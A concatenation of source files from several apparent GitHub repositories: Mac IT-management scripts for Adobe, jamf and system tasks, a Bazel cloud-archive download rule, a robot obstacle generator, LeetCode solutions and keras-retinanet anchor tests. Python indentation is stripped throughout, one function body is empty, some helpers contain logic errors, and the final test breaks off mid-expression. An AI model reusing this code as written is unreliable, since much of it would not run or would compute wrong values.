config = DraconicConfig(max_loops=10000, max_const_len=10000)
i = DraconicInterpreter(config=config)
expr = """
while True:
a = [0] * 10000
""".strip()
with pytest.raises(TooManyStatements):
i.execute(expr)
``` |
{
"source": "1duo/autokeras",
"score": 3
} |
#### File: autokeras/autokeras/metric.py
```python
from abc import abstractmethod
from sklearn.metrics import accuracy_score
class Metric:
@classmethod
@abstractmethod
def higher_better(cls):
pass
@classmethod
@abstractmethod
def compute(cls, prediction, target):
pass
class Accuracy(Metric):
@classmethod
def higher_better(cls):
return True
@classmethod
def compute(cls, prediction, target):
return accuracy_score(prediction, target)
``` |
{
"source": "1dustindavis/IT-CPE",
"score": 3
} |
#### File: IT-CPE/adobe_tools/add_adobe.py
```python
import sys
import adobe_api
import adobe_tools
target_product = sys.argv[1]
me = ldap_lookup() # Replace this with your own user lookup method
email = me.email
firstname = me.first_name
lastname = me.last_name
country = 'US'
def log(message):
try:
# Do I exist as a user?
if not adobe_tools.user_exists(email):
log("Creating account for %s" % email)
# Add the user
success = adobe_tools.add_federated_user(
email,
email,
firstname,
lastname,
country
)
if not success:
log("Failed to create account for %s" % email)
sys.exit(1)
# Does the user already have the product?
log("Checking to see if %s already has %s" % (email, target_product))
already_have = adobe_tools.does_user_have_product(email, target_product)
if already_have:
log("User %s already has product %s" % (email, target_product))
sys.exit(0)
# Add desired product
log("Adding %s entitlement to %s" % (target_product, email))
result = adobe_tools.add_products([target_product], email)
if not result:
log("Failed to add product %s to %s" % (target_product, email))
sys.exit(1)
log("Done.")
except adobe_api.AdobeAPIBadStatusException as e:
log("Encountered exception: %s" % e)
log(
"You were most likely rate limited - "
"this will automatically try again later. "
"Alternatively, please contact Help Desk."
)
exit(1)
```
#### File: IT-CPE/autodmg_cache_builder/autodmg_utility.py
```python
import subprocess
import os
import tempfile
import shutil
def run(cmd):
"""Run a command with subprocess, printing output in realtime."""
proc = subprocess.Popen(
cmd,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT
)
while proc.poll() is None:
l = proc.stdout.readline()
print l,
print proc.stdout.read()
return proc.returncode
def pkgbuild(root_dir, identifier, version, pkg_output_file):
"""Build a package from root_dir at pkg_output_file."""
cmd = [
'/usr/bin/pkgbuild',
'--root', root_dir,
'--identifier', identifier,
'--version', version,
pkg_output_file]
run(cmd)
def build_pkg(source, output, receipt, destination, cache_dir, comment=''):
"""
Construct package using pkgbuild.
source - the directory to build a package from
output - the name of the package file to build ('.pkg' is appended)
receipt - the receipt of the package
destination - the directory path to place the payload in
cache_dir - the directory to place the built package into
comment - A message to print out when building
"""
if os.path.isdir(source) and os.listdir(source):
print comment
pkg_name = '%s.pkg' % output
# We must copy the contents into a temp folder and build
prefix = 'cpe_%s' % receipt.split('.')[-1]
temp_dir = tempfile.mkdtemp(prefix=prefix, dir='/tmp')
pkg_dir = os.path.join(temp_dir, destination.lstrip('/'))
# Copy the contents of the folder into place
shutil.copytree(source, pkg_dir)
# Build the package
output_file = os.path.join(cache_dir, pkg_name)
pkgbuild(
temp_dir,
receipt,
'1.0',
output_file
)
# Clean up after ourselves
shutil.rmtree(temp_dir, ignore_errors=True)
# Return the path to the package
if os.path.isfile(output_file):
return output_file
# If nothing was built, return empty string
return ''
def populate_ds_repo(image_path, repo):
"""Move a built image into the DS repo."""
repo_hfs = os.path.join(repo, 'Masters', 'HFS')
image_name = os.path.basename(image_path)
if not image_path.endswith('.hfs.dmg') and image_path.endswith('.dmg'):
# DS masters must end in '.hfs.dmg'
print 'Renaming image to ".hfs.dmg" for DS support'
image_name = image_name.split('.dmg')[0] + '.hfs.dmg'
repo_target = os.path.join(repo_hfs, image_name)
if os.path.isfile(repo_target):
# If the target already exists, name it "-OLD"
newname = repo_target.split('.hfs.dmg')[0] + '-OLD.hfs.dmg'
print "Renaming old image to %s" % newname
os.rename(repo_target, newname)
# now copy the newly built image over
print "Copying new image to DS Repo."
print "Image path: %s" % image_path
print "Repo target: %s" % repo_target
shutil.move(image_path, repo_target)
```
#### File: lib/modules/casper_tools.py
```python
import urllib2
import xml.dom.minidom
import api_tools
import shell_tools
def configure(username):
"""
configure(ad_account)
Basic jamf enrollment
"""
shell_tools.run("jamf recon -realname '%s'" % username)
def flush_policies():
"""
flush_policies()
Flush all Casper policies. Requires root priviledges.
"""
shell_tools.run("jamf flushPolicyHistory")
def get_casper_auth():
"""
get_casper_auth()
Enable interaction with the casper api, casper requires a BasicAuthHandler
"""
username = ''
password = ''
top_level_url = ''
return api_tools.auth_init(top_level_url, username, password)
def trigger_policy(policy):
"""
trigger_policy(policy)
Trigger a casper policy by passing the policy name
"""
return shell_tools.run("jamf policy -trigger %s" % (policy))["success"]
def query_casper(resource, id=None, opener=None):
"""
query_casper(resource, id=None, opener=None)
Fetch and parse XML from Casper API
Requires a resource and ID (see parse_network_segments for example)
https://casper.somedomain.com/apiFrontPage.rest
"""
if not opener:
opener = get_casper_auth()
urllib2.install_opener(opener)
url = "https://casper.somedomain.com/JSSResource/%s" % (resource)
if id:
url += "/id/%s" % (id)
try:
return xml.dom.minidom.parse(urllib2.urlopen(url))
except (urllib2.HTTPError, urllib2.URLError):
return None
```
#### File: lib/modules/sys_tools.py
```python
import hashlib
import os
import re
import signal
import subprocess
import syslog
import time
import shell_tools
import sys_tools
def activate_application(app_name):
"""
activate_application(app_name)
"""
launch_app = """osascript<<END
activate application "%s"
END""" % (app_name)
os.system(launch_app)
def create_local_account(user, full_name, password, admin=False, hidden=False):
"""
create_local_account(user, full_name, password, admin=False)
Creates a local account on the computer. If admin is True, This
account will be able to administer the computer
hiddden=True will only work if the "hide500users" is set to true in the
loginwindow plist
"""
dscl_command = "dscl ."
home_dir = "/Users/%s" % user
uids = shell_tools.run(
"%s -list /Users UniqueID | awk \\'{print $2}\\'" % (dscl_command),
sanitize=False
)["stdout"].split()
next_id = map(int, uids)
next_id.sort()
next_id = next_id[-1]
# UIDs less than 500 are hidden, set it equal to 500 to be incremented
if next_id < 500:
if not hidden:
next_id = 500
# Increment by 1 for the next free UID
user_id = next_id + 1
# Create it manually as not to rely on casper
create_user_commands = [
"create %s" % home_dir,
"create %s UserShell /bin/bash" % home_dir,
"create %s RealName \\'%s\\'" % (home_dir, full_name),
"create %s UniqueID %s" % (home_dir, user_id),
"create %s PrimaryGroupID 1000" % home_dir,
"create %s NFSHomeDirectory%s" % (home_dir, home_dir),
"passwd %s \\'%s\\'" % (home_dir, password),
]
if admin:
create_user_commands.append(
"append /Groups/admin GroupMembership %s" % user
)
for command in create_user_commands:
shell_tools.run("%s %s" % (dscl_command, command))
def configure_time():
"""
configure_time()
Sync and enable to point to time_server variable
"""
# Turn the time setting off to force use ntpdate to sync
time_server = "time.apple.com"
time_commands = [
"systemsetup -setusingnetworktime off",
"ntpdate %s" % time_server,
"systemsetup -setusingnetworktime on",
"systemsetup -setnetworktimeserver %s" % time_server,
]
for command in time_commands:
shell_tools.run(command)
def enough_space(required_space):
"""
enough_space(required_space)
Returns whether there is enough space on the root volume given
the required_space
"""
return True if get_free_hd_space("gigabytes") - required_space < 3 else False
def get_computer_name():
"""
get_hostname()
Returns the machine's hostname
"""
return shell_tools.run("scutil --get ComputerName")["stdout"]
def get_model(short=False):
"""
get_model(short=False)
Returns the machine's hardware model
"""
models = {
"Mac Pro": "pro",
"MacBook Air": "mba",
"MacBook Pro": "mbp",
"Mac mini": "mm",
"iMac": "im"
}
model = query_profiler(
"SPHardwareDataType", ["Hardware Overview", "Model Name"]
)
if short:
# Default to mac when not found
return models.get(model, "mac")
else:
return model
def get_os_version():
"""
get_os_version()
Returns the operating system version
"""
return shell_tools.run("sw_vers -productVersion")["stdout"]
def get_serial():
"""
get_serial()
Returns the machine's serial number
"""
return query_profiler(
"SPHardwareDataType", ["Hardware Overview", "Serial Number (system)"]
)
def get_shard(serial=None, salt=None, chunks=10):
"""
get_shard(serial=None, salt=None, chunks=10)
Returns the machine's unique shard number
serial => Pass a serial for another machine to get its shard
salt => Pass a salt to generate the hash
chunks => Pass an int to set number of chunks.
"""
md5 = hashlib.md5()
if not serial:
serial = get_serial()
if salt:
serial = str(serial) + str(salt)
md5.update(serial)
digest = md5.hexdigest()
number = int(digest, 16)
shard = number % int(chunks)
return shard
def get_total_memory():
"""
get_total_memory()
Returns the total memory in GBs
"""
total_memory = shell_tools.run('sysctl -a | grep hw.memsize')['stdout']
return (int(total_memory.split('=')[-1]) / (1024 * 3))
def get_time_since(time, mode="secs"):
"""
get_time_since(time, mode="secs")
Returns the time since in seconds
mode options: year, weeks, days, hours, mins, secs
"""
now = shell_tools.get_unix_time()
unit = {
'years': 365 * 86400,
'weeks': 604800,
'days': 86400,
'hours': 3600,
'mins': 60,
'secs': 0,
}
since = now - time
if unit[mode] == 0:
return since
return since / unit[mode]
def get_used_memory():
"""
get_used_memory()
Returns the machine's used memory in MB
"""
get_top_memory = shell_tools.run(
'top -l 1 | grep PhysMem')['stdout'].split()
return get_top_memory[1]
def get_uptime():
"""
get_uptime()
Get system uptime in minutes.
"""
boot_time = int(shell_tools.run(
"sysctl -n kern.boottime")["stdout"].split()[3].strip(',')
)
return (shell_tools.get_unix_time() - boot_time) / 60
def query_profiler(
data_type,
path,
needle=None,
verbose=False,
ending=True,
numeric=False,
periods=True,
):
"""
query_profiler(data_type, path, needle=None, verbose=False,
ending=True, numeric=False, periods=True,)
needle: Needle to search for in haystack. Returns T/F and ignores
other conditions. Use path=[]
verbose: Ending parenthesis and their contents if they exist.
ending: Last word. "160 GB" => "160".
numeric: All non-numeric chars.
periods: All periods. Exclusive of numeric option.
Returns the value at the end of a path of keys.
Try: "SPStorageDataType",
["Macintosh HD", "Physical Volumes", "disk0s2", "Size"]
Options for keeping / removing part of the string. True = keep,
False = remove.
"""
output = subprocess.Popen(
["system_profiler", data_type], stdout=subprocess.PIPE).communicate()[0]
path_index = 0
if needle:
return True if needle in output else False
for line in output.splitlines():
if line.strip().startswith(path[path_index]):
if path_index >= len(path) - 1:
# Return only the value. Ignore "key: ".
value = line.strip()[len(path[path_index]) + 2:]
if not verbose:
# Chop off ending content in parenthesis if it exists.
if value[-1] == ")":
value = value[:value.find("(") - 1]
if not ending:
# Chop off last word of value.
value = value.rsplit(" ", 1)[0]
if not periods:
# Remove all periods.
value = re.sub(r"\.", "", value)
elif numeric:
# Remove non-numeric chars.
value = re.sub(r"\D", "", value)
return value
else:
path_index += 1
def launchctl_load(name_of_daemon):
"""
load_launch_daemon(name_of_daemon)
Loads the launch daemon
"""
shell_tools.run(
"launchctl load -w %s/%s" %
(sys_tools.get_sys_path('launchdaemons'), name_of_daemon)
)
def launchctl_reload(name_of_daemon):
"""
reload_launch_daemon(name_of_daemon)
Unloads the daemon, waits one second, then loads the daemon
"""
launchctl_unload(name_of_daemon)
sleep(secs=1)
launchctl_load(name_of_daemon)
def launchctl_unload(name_of_daemon):
"""
unload_launch_daemon(name_of_daemon)
Unloads the name of daemon
"""
sleep(secs=3)
shell_tools.run(
"launchctl unload -w %s/%s" %
(sys_tools.get_sys_path('launchdaemons'), name_of_daemon)
)
def log(tag, message):
"""
log(tag, message)
Writes the tag and message to the syslog
"""
syslog.openlog(tag)
syslog.syslog(syslog.LOG_ALERT, message)
def logout():
"""
logout()
Logs the current user out of the GUI
"""
logout = """osascript<<END
tell application "System Events" to logout
END"""
os.system(logout)
def get_hd_capacity():
"""
get_hd_capacity()
Get the main HD's capacity in gigabtyes (float)
"""
# Determine HD name
hd_name = get_hd_name()
return float(query_profiler(
"SPStorageDataType", [hd_name, "Capacity"], ending=False)
)
def get_free_hd_space(unit):
"""
get_free_hd_space(unit)
Get the main HD's free space in gigabytes, will convert to bytes, megabytes,
or gigabytes if specified
"""
gigabyte_size = 1024
megabyte_size = 1048576
# Determine HD name
hd_name = get_hd_name()
# Query_profiler returns free space in GB as a strig
free_space = query_profiler(
"SPStorageDataType", [hd_name, "Available"], ending=False)
free_space = int(float(free_space))
if unit == "gigabytes":
return free_space
if unit == "megabytes":
return free_space * gigabyte_size
if unit == "bytes":
return (free_space * gigabyte_size) * megabyte_size
def get_hd_name():
"""
get_hd_name()
Returns the root hard drive name
"""
hd_name = shell_tools.run(
"diskutil info / | grep Volume | grep Name"
)["stdout"].split()[2:]
return " ".join(hd_name)
def get_hd_used_space():
"""
get_hd_used_space()
Returns the amount of space used on the machine (float)
"""
capacity = float(get_hd_capacity())
available = float(get_free_hd_space("gigabytes"))
return capacity - available
def install_pkg(pkg, base_dir='/'):
"""
install_pkg(pkg, base_dir='/')
Use the installer utility to install packages in root(/) by default
"""
install_cmd = '/usr/sbin/installer -pkg %s -target %s' % (pkg, base_dir)
install_results = shell_tools.run(install_cmd)
if not install_results['success']:
raise Exception(install_results['stderr'], install_results['stdout'])
def is_process_running(process):
"""
is_process_running(process)
Checks to see if a process is running.
"""
all_processes = os.popen("ps -Af").read()
return True if process in all_processes else False
def is_desktop():
"""
is_desktop():
Returns whether or not the machines is a desktop
"""
return True if not is_laptop() else False
def is_laptop():
"""
is_laptop():
Returns whether or not the machines is a laptop
"""
return True if 'book' in get_model().lower() else False
def kill_process(pid):
"""
kill_process(pid)
Kills a process given a pid
"""
try:
os.kill(int(pid), signal.SIGKILL)
except OSError:
print "No process running."
def set_machine_name(hostname):
"""
set_hostname(hostname)
Sets the machine's hostname
"""
shell_tools.run("scutil --set ComputerName %s" % hostname)
shell_tools.run("scutil --set LocalHostName %s" % hostname)
def sleep(secs=None, mins=None, hrs=None, days=None):
"""
sleep(secs=None, mins=None, hrs=None, days=None)
Sleeps for a given duration
"""
sleep_time = secs
if mins:
sleep_time = 60 * mins
if hrs:
sleep_time = 60 * 60 * hrs
if days:
sleep_time = 60 * 60 * 24 * days
time.sleep(sleep_time)
def verify_hd_name():
"""
verify_hd_name()
Verify that the disk is named "Macintosh HD," otherwise rename it
"""
if get_hd_name() != "Macintosh HD":
shell_tools.run("diskutil rename / \"Macintosh\ HD\"")
``` |
{
"source": "1E0-may/path_follower",
"score": 2
} |
#### File: 1E0-may/path_follower/build_obstacles.py
```python
import numpy as np
import pandas as pd
import os
OBS_FILE_PATH = os.path.join(os.path.dirname(os.path.abspath(__file__)),
"src", "rosbot_navigation", "src", "obs.csv")
OBS_TEMPLATE_PATH = os.path.join(os.path.dirname(os.path.abspath(__file__)),
"src", "rosbot_gazebo", "obstacles", "obstacle_{}.urdf")
OBS_LAUNCH_PATH = os.path.join(os.path.dirname(os.path.abspath(__file__)),
"src", "rosbot_gazebo", "launch", "obstacles.launch")
CYLINDER_TEMPLATE_URDF = """<robot name="obstacle_{}">
<link name="obstacle_{}">
<inertial>
<origin xyz="{} {} 0" />
<mass value="1000.0" />
<inertia ixx="1000.0" ixy="0.0" ixz="0.0" iyy="1000.0" iyz="0.0" izz="1000.0" />
</inertial>
<visual>
<origin xyz="{} {} 0"/>
<geometry>
<cylinder radius="{}" length="0.1" />
</geometry>
</visual>
<collision>
<origin xyz="{} {} 0"/>
<geometry>
<cylinder radius="{}" length="0.1" />
</geometry>
</collision>
</link>
<gazebo reference="obstacle_{}">
<static>true</static>
<material>Gazebo/Blue</material>
</gazebo>
</robot>"""
OBST_URDF = """
<node name="spawn_obj_{}" pkg="gazebo_ros" type="spawn_model"
args="-urdf -file $(find rosbot_gazebo)/obstacles/obstacle_{}.urdf -urdf -model obstacle_{}"
respawn="false" output="screen" />
"""
def calculate_radius(mu, alpha):
"""
BUILD THIS FUNCTION TO RETURN A VALUE IN METERS
"""
return float(mu + alpha) / 10.
def main():
obs = pd.read_csv(OBS_FILE_PATH, header=None)
launch = open(OBS_LAUNCH_PATH, "w+")
launch.write("""<?xml version="1.0" encoding="UTF-8"?>\n<launch>""")
for idx, o in enumerate(obs.values.astype(float).reshape((2, -1))):
r = calculate_radius(o[2], o[3])
if r <= 0:
continue
temp_obs = CYLINDER_TEMPLATE_URDF.format(idx+1, idx+1,
o[0], o[1],
o[0], o[1], r,
o[0], o[1], r,
idx+1)
with open(OBS_TEMPLATE_PATH.format(idx + 1), "w+") as f:
f.write(temp_obs)
launch.write(OBST_URDF.format(idx + 1, idx + 1, idx + 1))
launch.write("""</launch>""")
launch.close()
if __name__ == "__main__":
main()
``` |
{
"source": "1e0ndavid/1e0ndavid.github.io",
"score": 3
} |
#### File: 1e0ndavid.github.io/leetcode/lc509.py
```python
class Solution:
def fib1(self, N: int) -> int:
res = [0, 1]
if N <= 1:
return res[N]
else:
return self.fib1(N-1) + self.fib1(N-2)
def fib2(self, N: int) -> int:
res = [0, 1]
if N <= 1:
return res[N]
else:
fibNminusOne = 0
fibNminusTwo = 1
for _ in range(N):
fibN = fibNminusOne + fibNminusTwo
fibNminusTwo, fibNminusOne = fibNminusOne, fibN
return fibN
def fib3(self, N: int) -> int:
fibNminusOne, fibNminusTwo = 0, 1
for _ in range(N):
fibNminusTwo, fibNminusOne = fibNminusOne, fibNminusOne + fibNminusTwo
return fibNminusOne
def fib4(self, N: int) -> int:
return 0
if __name__ == '__main__':
s = Solution()
for i in range(11):
print(s.fib1(i), s.fib2(i), s.fib3(i))
```
#### File: 1e0ndavid.github.io/leetcode/plot_mission.py
```python
import random
import matplotlib.pyplot as plt
import re
def plot_scatter(missions):
plt.figure(figsize=(10, 6))
for m in missions:
x, y = missions[m][0], missions[m][1]
if x + y >= 5:
clr = 'r'
elif x + y == 4:
clr = 'b'
else:
clr = 'y'
rd1, rd2 = random.uniform(-0.1, 0.1), random.uniform(-0.1, 0.1)
plt.scatter(x + rd1, y + rd2, marker='x', color=clr)
plt.annotate(m, (x + rd1, y + rd2), fontsize=10)
plt.ylabel('Importance')
plt.xlabel('Urgency')
plt.grid()
plt.show()
plt.savefig("missions.png")
if __name__ == "__main__":
filename = "missions"
with open(filename) as f:
data = f.readlines()
missions = {}
for line in data:
name = line.split()[2]
quantities = list(map(int, re.findall('\d', line)[-2:]))
missions.update({name: quantities})
plot_scatter(missions)
``` |
{
"source": "1e100/cloud_archive",
"score": 3
} |
#### File: 1e100/cloud_archive/cloud_archive.bzl
```python
def validate_checksum(repo_ctx, url, local_path, expected_sha256):
# Verify checksum
sha256_path = repo_ctx.which("sha256sum")
repo_ctx.report_progress("Checksumming {}.".format(local_path))
sha256_result = repo_ctx.execute([sha256_path, local_path])
if sha256_result.return_code != 0:
fail("Failed to verify checksum: {}".format(sha256_result.stderr))
sha256 = sha256_result.stdout.split(" ")[0]
if sha256 != expected_sha256:
fail("Checksum mismatch for {}, expected {}, got {}.".format(
url,
expected_sha256,
sha256,
))
def extract_archive(repo_ctx, local_path, strip_prefix, build_file, build_file_contents):
bash_path = repo_ctx.os.environ.get("BAZEL_SH", "bash")
if local_path.endswith(".tar.zst") or local_path.endswith(".tzst"):
# Recent TAR supports zstd, if the compressor is installed.
zst_path = repo_ctx.which("zstd")
if zst_path == None:
fail("To decompress .tar.zst, install zstd.")
tar_path = repo_ctx.which("tar")
if tar_path == None:
fail("To decompress .tar.zst, install tar.")
extra_tar_params = []
if strip_prefix != None and strip_prefix:
# Trick: we need to extract a subdir, and remove its components
# from the path. We do so via `tar xvf file.tar.zst sub/dir
# --strip-components=N`. Here we figure out the N.
num_components = 0
prefix = strip_prefix.strip("/")
for c in prefix.split("/"):
if len(c) > 0:
num_components += 1
extra_tar_params = [prefix, "--strip-components=" + str(num_components)]
# Decompress with tar, piping through zstd internally, and stripping prefix
# if requested.
tar_cmd = [tar_path, "-x", "-f", local_path] + extra_tar_params
repo_ctx.execute(tar_cmd)
else:
# Extract the downloaded archive using Bazel's built-in decompressors.
repo_ctx.extract(local_path, stripPrefix = strip_prefix)
# Provide external BUILD file if requested; `build_file_contents` takes
# priority.
if build_file_contents:
repo_ctx.execute([bash_path, "-c", "rm -f BUILD BUILD.bazel"])
repo_ctx.file("BUILD.bazel", build_file_contents, executable = False)
elif build_file:
repo_ctx.execute([bash_path, "-c", "rm -f BUILD BUILD.bazel"])
repo_ctx.symlink(build_file, "BUILD.bazel")
def cloud_archive_download(
repo_ctx,
file_path,
expected_sha256,
provider,
patches,
patch_args,
bucket = "",
strip_prefix = "",
build_file = "",
build_file_contents = "",
profile = ""):
""" Securely downloads and unpacks an archive from Minio, then places a
BUILD file inside. """
filename = repo_ctx.path(file_path).basename
# Download tooling is pretty similar, but commands are different. Note that
# Minio does not support bucket per se. The path is expected to contain what
# you'd normally feed into `mc`.
if provider == "minio":
tool_path = repo_ctx.which("mc")
src_url = file_path
cmd = [tool_path, "cp", "-q", src_url, "."]
elif provider == "google":
tool_path = repo_ctx.which("gsutil")
src_url = "gs://{}/{}".format(bucket, file_path)
cmd = [tool_path, "cp", src_url, "."]
elif provider == "s3":
tool_path = repo_ctx.which("aws")
extra_flags = ["--profile", profile] if profile else []
src_url = "s3://{}/{}".format(bucket, file_path)
cmd = [tool_path] + extra_flags + ["s3", "cp", src_url, "."]
elif provider == "backblaze":
# NOTE: currently untested, as I don't have a B2 account.
tool_path = repo_ctx.which("b2")
src_url = "b2://{}/{}".format(bucket, file_path)
cmd = [tool_path, "download-file-by-name", "--noProgress", bucket, file_path, "."]
else:
fail("Provider not supported: " + provider.capitalize())
if tool_path == None:
fail("Could not find command line utility for {}".format(provider.capitalize()))
# Download.
repo_ctx.report_progress("Downloading {}.".format(src_url))
result = repo_ctx.execute(cmd, timeout = 1800)
if result.return_code != 0:
fail("Failed to download {} from {}: {}".format(src_url, provider.capitalize(), result.stderr))
# Verify.
filename = repo_ctx.path(src_url).basename
validate_checksum(repo_ctx, file_path, filename, expected_sha256)
# Extract
extract_archive(repo_ctx, filename, strip_prefix, build_file, build_file_contents)
# If patches are provided, apply them.
if patches != None and len(patches) > 0:
patches = [str(repo_ctx.path(patch)) for patch in patches]
# Built in Bazel patch only supports -pN or no parameters at all, so we
# determine if we can use the built in patch.
only_strip_param = (patch_args != None and
len(patch_args) == 1 and
patch_args[0].startswith("-p") and
patch_args[0][2:].isdigit())
strip_n = 0
if only_strip_param:
strip_n = int(patch_args[0][2:])
if patch_args == None or only_strip_param:
# OK to use built-in patch.
for patch in patches:
repo_ctx.patch(patch, strip = strip_n)
else:
# Must use extrenal patch. Note that this hasn't been tested, so it
# might not work. If it's busted, please send a PR.
patch_path = repo_ctx.which("patch")
for patch in patches:
patch_cmd = [patch_path] + patch_args + ["-i", patch]
result = repo_ctx.execute(patch_cmd)
if result.return_code != 0:
fail("Patch {} failed to apply.".format(patch))
def _cloud_archive_impl(ctx):
cloud_archive_download(
ctx,
ctx.attr.file_path,
ctx.attr.sha256,
provider = ctx.attr._provider,
patches = ctx.attr.patches,
patch_args = ctx.attr.patch_args,
strip_prefix = ctx.attr.strip_prefix,
build_file = ctx.attr.build_file,
build_file_contents = ctx.attr.build_file_contents,
profile = ctx.attr.profile if hasattr(ctx.attr, "profile") else "",
bucket = ctx.attr.bucket if hasattr(ctx.attr, "bucket") else "",
)
minio_archive = repository_rule(
implementation = _cloud_archive_impl,
attrs = {
"file_path": attr.string(
mandatory = True,
doc = "Path to the file on minio. Backend needs to be set up locally for this to work.",
),
"sha256": attr.string(mandatory = True, doc = "SHA256 checksum of the archive"),
"build_file": attr.label(
allow_single_file = True,
doc = "BUILD file for the unpacked archive",
),
"build_file_contents": attr.string(doc = "The contents of the build file for the target"),
"patches": attr.label_list(doc = "Patches to apply, if any.", allow_files = True),
"patch_args": attr.string_list(doc = "Arguments to use when applying patches."),
"strip_prefix": attr.string(doc = "Prefix to strip when archive is unpacked"),
"_provider": attr.string(default = "minio"),
},
)
s3_archive = repository_rule(
implementation = _cloud_archive_impl,
attrs = {
"bucket": attr.string(mandatory = True, doc = "Bucket name"),
"file_path": attr.string(
mandatory = True,
doc = "Relative path to the archive file within the bucket",
),
"profile": attr.string(doc = "Profile to use for authentication."),
"sha256": attr.string(mandatory = True, doc = "SHA256 checksum of the archive"),
"build_file": attr.label(
allow_single_file = True,
doc = "BUILD file for the unpacked archive",
),
"build_file_contents": attr.string(doc = "The contents of the build file for the target"),
"patches": attr.label_list(doc = "Patches to apply, if any.", allow_files = True),
"patch_args": attr.string_list(doc = "Arguments to use when applying patches."),
"strip_prefix": attr.string(doc = "Prefix to strip when archive is unpacked"),
"_provider": attr.string(default = "s3"),
},
)
gs_archive = repository_rule(
implementation = _cloud_archive_impl,
attrs = {
"bucket": attr.string(mandatory = True, doc = "Google Storage bucket name"),
"file_path": attr.string(
mandatory = True,
doc = "Relative path to the archive file within the bucket",
),
"sha256": attr.string(mandatory = True, doc = "SHA256 checksum of the archive"),
"build_file": attr.label(
allow_single_file = True,
doc = "BUILD file for the unpacked archive",
),
"build_file_contents": attr.string(doc = "The contents of the build file for the target"),
"patches": attr.label_list(doc = "Patches to apply, if any.", allow_files = True),
"patch_args": attr.string_list(doc = "Arguments to use when applying patches."),
"strip_prefix": attr.string(doc = "Prefix to strip when archive is unpacked"),
"_provider": attr.string(default = "google"),
},
)
b2_archive = repository_rule(
implementation = _cloud_archive_impl,
attrs = {
"bucket": attr.string(mandatory = True, doc = "Backblaze B2 bucket name"),
"file_path": attr.string(
mandatory = True,
doc = "Relative path to the archive file within the bucket",
),
"sha256": attr.string(mandatory = True, doc = "SHA256 checksum of the archive"),
"build_file": attr.label(
allow_single_file = True,
doc = "BUILD file for the unpacked archive",
),
"build_file_contents": attr.string(doc = "The contents of the build file for the target"),
"patches": attr.label_list(doc = "Patches to apply, if any.", allow_files = True),
"patch_args": attr.string_list(doc = "Arguments to use when applying patches."),
"strip_prefix": attr.string(doc = "Prefix to strip when archive is unpacked"),
"_provider": attr.string(default = "backblaze"),
},
)
``` |
{
"source": "1e100/keras-retinanet",
"score": 2
} |
#### File: tests/utils/test_anchors.py
```python
import numpy as np
import configparser
from tensorflow import keras
from keras_retinanet.utils.anchors import anchors_for_shape, AnchorParameters
from keras_retinanet.utils.config import read_config_file, parse_anchor_parameters
def test_config_read():
config = read_config_file("tests/test-data/config/config.ini")
assert "anchor_parameters" in config
assert "sizes" in config["anchor_parameters"]
assert "strides" in config["anchor_parameters"]
assert "ratios" in config["anchor_parameters"]
assert "scales" in config["anchor_parameters"]
assert config["anchor_parameters"]["sizes"] == "32 64 128 256 512"
assert config["anchor_parameters"]["strides"] == "8 16 32 64 128"
assert config["anchor_parameters"]["ratios"] == "0.5 1 2 3"
assert config["anchor_parameters"]["scales"] == "1 1.2 1.6"
def create_anchor_params_config():
config = configparser.ConfigParser()
config["anchor_parameters"] = {}
config["anchor_parameters"]["sizes"] = "32 64 128 256 512"
config["anchor_parameters"]["strides"] = "8 16 32 64 128"
config["anchor_parameters"]["ratios"] = "0.5 1"
config["anchor_parameters"]["scales"] = "1 1.2 1.6"
return config
def test_parse_anchor_parameters():
config = create_anchor_params_config()
anchor_params_parsed = parse_anchor_parameters(config)
sizes = [32, 64, 128, 256, 512]
strides = [8, 16, 32, 64, 128]
ratios = np.array([0.5, 1], keras.backend.floatx())
scales = np.array([1, 1.2, 1.6], keras.backend.floatx())
assert sizes == anchor_params_parsed.sizes
assert strides == anchor_params_parsed.strides
np.testing.assert_equal(ratios, anchor_params_parsed.ratios)
np.testing.assert_equal(scales, anchor_params_parsed.scales)
def test_anchors_for_shape_dimensions():
sizes = [32, 64, 128]
strides = [8, 16, 32]
ratios = np.array([0.5, 1, 2, 3], keras.backend.floatx())
scales = np.array([1, 1.2, 1.6], keras.backend.floatx())
anchor_params = AnchorParameters(sizes, strides, ratios, scales)
pyramid_levels = [3, 4, 5]
image_shape = (64, 64)
all_anchors = anchors_for_shape(
image_shape, pyramid_levels=pyramid_levels, anchor_params=anchor_params
)
assert all_anchors.shape == (1008, 4)
def test_anchors_for_shape_values():
sizes = [12]
strides = [8]
ratios = np.array([1, 2], keras.backend.floatx())
scales = np.array([1, 2], keras.backend.floatx())
anchor_params = AnchorParameters(sizes, strides, ratios, scales)
pyramid_levels = [3]
image_shape = (16, 16)
all_anchors = anchors_for_shape(
image_shape, pyramid_levels=pyramid_levels, anchor_params=anchor_params
)
# using almost_equal for floating point imprecisions
np.testing.assert_almost_equal(
all_anchors[0, :],
[
strides[0] / 2 - (sizes[0] * scales[0] / np.sqrt(ratios[0])) / 2,
strides[0] / 2 - (sizes[0] * scales[0] * np.sqrt(ratios[0])) / 2,
strides[0] / 2 + (sizes[0] * scales[0] / np.sqrt(ratios[0])) / 2,
strides[0] / 2 + (sizes[0] * scales[0] * np.sqrt(ratios[0])) / 2,
],
decimal=6,
)
np.testing.assert_almost_equal(
all_anchors[1, :],
[
strides[0] / 2 - (sizes[0] * scales[1] / np.sqrt(ratios[0])) / 2,
strides[0] / 2 - (sizes[0] * scales[1] * np.sqrt(ratios[0])) / 2,
strides[0] / 2 + (sizes[0] * scales[1] / np.sqrt(ratios[0])) / 2,
strides[0] / 2 + (sizes[0] * scales[1] * np.sqrt(ratios[0])) / 2,
],
decimal=6,
)
np.testing.assert_almost_equal(
all_anchors[2, :],
[
strides[0] / 2 - (sizes[0] * scales[0] / np.sqrt(ratios[1])) / 2,
strides[0] / 2 - (sizes[0] * scales[0] * np.sqrt(ratios[1])) / 2,
strides[0] / 2 + (sizes[0] * scales[0] / np.sqrt(ratios[1])) / 2,
strides[0] / 2 + (sizes[0] * scales[0] * np.sqrt(ratios[1])) / 2,
],
decimal=6,
)
np.testing.assert_almost_equal(
all_anchors[3, :],
[
strides[0] / 2 - (sizes[0] * scales[1] / np.sqrt(ratios[1])) / 2,
strides[0] / 2 - (sizes[0] * scales[1] * np.sqrt(ratios[1])) / 2,
strides[0] / 2 + (sizes[0] * scales[1] / np.sqrt(ratios[1])) / 2,
strides[0] / 2 + (sizes[0] * scales[1] * np.sqrt(ratios[1])) / 2,
],
decimal=6,
)
np.testing.assert_almost_equal(
all_anchors[4, :],
[
